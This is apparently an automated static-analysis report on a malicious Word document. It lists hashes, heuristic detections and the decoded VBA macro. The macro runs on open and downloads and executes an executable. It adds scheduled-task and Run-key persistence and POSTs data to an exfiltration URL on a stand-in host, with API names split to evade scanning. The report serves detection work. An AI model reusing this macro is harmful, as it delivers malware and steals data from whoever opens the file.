Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 7359068cbd759a8f…

MALICIOUS

Office (OOXML) / .DOCX

18.6 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-05-29
MD5: fd420bb14a79bf1c2bee1baf6dd02d71 SHA-1: f1ea5c13dea8b9f25d740953c1a7f2aebd533168 SHA-256: 7359068cbd759a8fbaf3d26cd739c6bd56fdbf5bb10ac9eea48d81fb7057c52b
250 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Dim shell As Object
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            stream.Write xmlHttp.ResponseBody
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Dim shell As Object
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://uithcm-# Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.microsoft.com/office/2019/extlstReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • https://uithcm-my.sharepoint.com/personal/23520498_ms_uit_edu_vn/Documents/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2277 bytes
SHA-256: 46bef19bcf2884492c70f723352da51ed009bb0778b14e16b8711f0bad262b53
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim shell As Object
    Dim xmlHttp As Object
    Dim stream As Object
    Dim taskName As String
    Dim exePath As String
    Dim registryPath As String
    Dim keyName As String
    Dim c2Server As String
    Dim dataToSend As String
    
    ' Set variables
    taskName = "U" & "pd" & "ateT" & "as" & "k"
    exePath = "C" & ":\W" & "in" & "do" & "ws\T" & "em" & "p\u" & "pd" & "at" & "e.e" & "xe"
    registryPath = "H" & "KEY_C" & "URREN" & "T_U" & "SER" & "ER\S" & "oftw" & "are\M" & "icr" & "oso" & "ft\W" & "ind" & "ows\C" & "urre" & "ntVe" & "rsi" & "on\R" & "un"
    keyName = "U" & "pd" & "ate" & "r"
    c2Server = "h" & "tt" & "p://" & "e" & "xa" & "mp" & "le.c" & "om/u" & "pd" & "at" & "e.e" & "xe"
    dataToSend = "S" & "ys" & "te" & "mI" & "nf" & "o"
    
    ' Download executable payload
    Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
    xmlHttp.Open "G" & "ET", c2Server, False
    xmlHttp.Send
    
    If xmlHttp.Status = 200 Then
        Set stream = CreateObject("A" & "DOB" & "D.S" & "t" & "ream")
        stream.Type = 1 ' adTypeBinary
        stream.Open
        stream.Write xmlHttp.ResponseBody
        stream.SaveToFile exePath, 2 ' adSaveCreateOverWrite
        stream.Close
    End If
    
    ' Execute the downloaded executable
    Set shell = CreateObject("W" & "Sc" & "ript.S" & "hell")
    shell.Run exePath, 0, True
    
    ' Create scheduled task
    shell.Run "s" & "cht" & "asks /" & "cre" & "ate /" & "tn " & taskName & " /" & "tr " & exePath & " /" & "sc on" & "logon", 0, True
    
    ' Add registry key for persistence
    shell.RegWrite registryPath & "\" & keyName & "\", exePath, "REG_S" & "Z"
    
    ' Exfiltrate data over HTTP
    Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
    xmlHttp.Open "P" & "OST", "h" & "tt" & "p://" & "e" & "xa" & "mp" & "le.c" & "om/e" & "xf" & "il", False
    xmlHttp.Send dataToSend
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11264 bytes
SHA-256: f6e175b1d30350277ee9e5a1bfc09fef3a66df0d4b959aeee9a6bc92e40d7612